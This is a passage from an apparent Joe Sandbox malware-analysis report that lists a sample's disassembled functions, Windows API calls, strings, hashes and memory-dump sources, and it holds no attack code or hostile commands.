                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                                          • Instruction ID: 10eb5b134e0ac7281f92b3cd452b5a87378d7ec926bfa41c0e066da6aae970cd
                                                                                                                                                                          • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                                                                          • Instruction Fuzzy Hash: 99517C65200F4867DF3485688596BBF23D5DB12304F2808DAE887DB783C605EF49F3A1
                                                                                                                                                                          Function 00B2EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7d251eafb95e6ce15352ee950c4ab22a500eed3f65e7c7a491870129a93dce54
                                                                                                                                                                          • Instruction ID: 2ec001b198b5d3e058af4ec5b6d1d6c489b650b02fe39f93fedc1155a31d8df1
                                                                                                                                                                          • Opcode Fuzzy Hash: 7d251eafb95e6ce15352ee950c4ab22a500eed3f65e7c7a491870129a93dce54
                                                                                                                                                                          • Instruction Fuzzy Hash: 3D51C2315083A68AD712CF24D14057EBFF0AE9A715F4A09FDE4DD9B243C221DB4ACB62
                                                                                                                                                                          Function 00B300B7 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c1ebbaf437c6c86b10abac9b972943bae88e460a85dab6e7888fdddd833611d0
                                                                                                                                                                          • Instruction ID: bc9b984f048b5fd5806fca790870eae604c39e4956d61f86af9a15fb1c9f8582
                                                                                                                                                                          • Opcode Fuzzy Hash: c1ebbaf437c6c86b10abac9b972943bae88e460a85dab6e7888fdddd833611d0
                                                                                                                                                                          • Instruction Fuzzy Hash: FA51DEB1A087159FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                                                                                                                                          Function 00B33E0B Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                                                          • Instruction ID: 8a439e5d457e23cb1400664864bd0e341a485a913fb965312d68fba557144199
                                                                                                                                                                          • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                                                                          • Instruction Fuzzy Hash: CE3107B1A147568FCB14DF28C89116ABBE0FB95714F50496DE489C7341C734EA0ACB91
                                                                                                                                                                          Function 00B2E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _swprintf.LIBCMT ref: 00B2E30E
                                                                                                                                                                            • Part of subcall function 00B24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B240A5
                                                                                                                                                                            • Part of subcall function 00B31DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00B61030,00000200,00B2D928,00000000,?,00000050,00B61030), ref: 00B31DC4
                                                                                                                                                                          • _strlen.LIBCMT ref: 00B2E32F
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00B5E274,?), ref: 00B2E38F
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00B2E3C9
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00B2E3D5
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B2E475
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00B2E4A2
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00B2E4DB
                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00B2E4E3
                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00B2E4EE
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00B2E51B
                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00B2E58D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                                                                          • String ID: $%s:$CAPTION$d
                                                                                                                                                                          • API String ID: 2407758923-2512411981
                                                                                                                                                                          • Opcode ID: a0cd57d47ce6daa9c5a3ec2bdaa99629dff86606f63814124d9e0984e813530a
                                                                                                                                                                          • Instruction ID: f3ea40ec17e19dea84224448d64d728a3dd2578a575ff783854393858a9ed990
                                                                                                                                                                          • Opcode Fuzzy Hash: a0cd57d47ce6daa9c5a3ec2bdaa99629dff86606f63814124d9e0984e813530a
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E81A272108311AFD710DFA9DC89A6FBBE9EB88B04F04091DFA98E7250D734E905CB52
                                                                                                                                                                          Function 00B4CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00B4CB66
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C71E
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C730
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C742
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C754
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C766
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C778
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C78A
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C79C
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7AE
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7C0
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7D2
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7E4
                                                                                                                                                                            • Part of subcall function 00B4C701: _free.LIBCMT ref: 00B4C7F6
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CB5B
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CB7D
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CB92
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CB9D
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CBBF
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CBD2
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CBE0
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CBEB
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CC23
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CC2A
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CC47
                                                                                                                                                                          • _free.LIBCMT ref: 00B4CC5F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                          • Opcode ID: 635805e67237cc4afbdfc766aefad4c81f02b808f0bd1ed14232cdb403b966dc
                                                                                                                                                                          • Instruction ID: 55629d27edcd76510c49afe788ef8369d05a8a9170869cdf8166ee8fcd1bf93b
                                                                                                                                                                          • Opcode Fuzzy Hash: 635805e67237cc4afbdfc766aefad4c81f02b808f0bd1ed14232cdb403b966dc
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B316031A023099FEB61AA39D846B5A7BE9EF10710F1044ADE558D7192DF31EE40EB50
                                                                                                                                                                          Function 00B39711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B39736
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B397D6
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00B397E5
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B39806
                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B3982D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                                                                          • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                                                                          • API String ID: 1777411235-4209811716
                                                                                                                                                                          • Opcode ID: c942c7f220894f2ec9ad8898ea9cfcf31f348ecdf1ce215a69616fe41f31963c
                                                                                                                                                                          • Instruction ID: 93bb7157580d0fd8f8082d0f4e5455339d0bbc5ae6a68b683b661c334347275c
                                                                                                                                                                          • Opcode Fuzzy Hash: c942c7f220894f2ec9ad8898ea9cfcf31f348ecdf1ce215a69616fe41f31963c
                                                                                                                                                                          • Instruction Fuzzy Hash: F73168321093017AE725AB349C46FAF77D8EF92751F2505CDF901921D2EFA09A0883A6
                                                                                                                                                                          Function 00B3D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00B3D6C1
                                                                                                                                                                          • GetClassNameW.USER32(00000000,?,00000800), ref: 00B3D6ED
                                                                                                                                                                            • Part of subcall function 00B31FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B2C116,00000000,.exe,?,?,00000800,?,?,?,00B38E3C), ref: 00B31FD1
                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00B3D709
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B3D720
                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00B3D734
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B3D75D
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00B3D764
                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00B3D76D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                                                                          • String ID: STATIC
                                                                                                                                                                          • API String ID: 3820355801-1882779555
                                                                                                                                                                          • Opcode ID: e09af600ccc055c4a53531c6704c71cda9b31d96f2c74794d3a2a3826a593905
                                                                                                                                                                          • Instruction ID: 69a82c4dc46a6af104bd2afc2af6ef83a77d65a3922a39049107b68c199bf440
                                                                                                                                                                          • Opcode Fuzzy Hash: e09af600ccc055c4a53531c6704c71cda9b31d96f2c74794d3a2a3826a593905
                                                                                                                                                                          • Instruction Fuzzy Hash: A111E172600310BBE221ABB4AC4AFAF76DCEB54F11F204161FA51B60E1DA64CF0587A6
                                                                                                                                                                          Function 00B496F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00B49705
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B49711
                                                                                                                                                                          • _free.LIBCMT ref: 00B4971C
                                                                                                                                                                          • _free.LIBCMT ref: 00B49727
                                                                                                                                                                          • _free.LIBCMT ref: 00B49732
                                                                                                                                                                          • _free.LIBCMT ref: 00B4973D
                                                                                                                                                                          • _free.LIBCMT ref: 00B49748
                                                                                                                                                                          • _free.LIBCMT ref: 00B49753
                                                                                                                                                                          • _free.LIBCMT ref: 00B4975E
                                                                                                                                                                          • _free.LIBCMT ref: 00B4976C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: e918099698fe0116354dd0c475fe862e9669fd3012b73ba0a16d59fb0297265f
                                                                                                                                                                          • Instruction ID: 9aa11293da445590053d3f5e81bcad9ba08dcb5fafaeb6053762c94d2d651546
                                                                                                                                                                          • Opcode Fuzzy Hash: e918099698fe0116354dd0c475fe862e9669fd3012b73ba0a16d59fb0297265f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7111A276911109AFCB01EF94C882CDD3BB5EF14350B5154E9FA088F262DE32EF50AB84
                                                                                                                                                                          Function 00B42E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                          • API String ID: 322700389-393685449
                                                                                                                                                                          • Opcode ID: eaa426be8a58032f68287467a0d44750c66ab7715d38aaa8735f96c5f9bd069e
                                                                                                                                                                          • Instruction ID: 61e2cda0cc0e866b400feeb9882127aa4c188af71a1ba30032f1deec21de2bc8
                                                                                                                                                                          • Opcode Fuzzy Hash: eaa426be8a58032f68287467a0d44750c66ab7715d38aaa8735f96c5f9bd069e
                                                                                                                                                                          • Instruction Fuzzy Hash: 38B15471800209EFCF29DFA4C8819AEBBF5EF14710F58419AF8116B212D735EB55EB91
                                                                                                                                                                          Function 00B26FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B26FAA
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B27013
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B27084
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B27AAB
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetLastError.KERNEL32 ref: 00B27AF1
                                                                                                                                                                            • Part of subcall function 00B27A9C: CloseHandle.KERNEL32(?), ref: 00B27B00
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                                                                          • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                          • API String ID: 3122303884-3508440684
                                                                                                                                                                          • Opcode ID: 4c827cba2d0c0b8bccc071f890528561e894f656abfbd57a20e37493dc99b4ba
                                                                                                                                                                          • Instruction ID: a1200b2235c1048b3678196e06e5a6b5e1974d1f92ae93244ff0650ef6acd9cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c827cba2d0c0b8bccc071f890528561e894f656abfbd57a20e37493dc99b4ba
                                                                                                                                                                          • Instruction Fuzzy Hash: CB4106B1D48364AAEF20E774AC82FEE77ECDF05740F0004D5FA4DA6182DA74AA488725
                                                                                                                                                                          Function 00B3B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3B610
                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 00B3B637
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00B3B650
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00B3B661
                                                                                                                                                                          • GetDlgItem.USER32(?,00000065), ref: 00B3B66A
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00B3B67E
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00B3B694
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
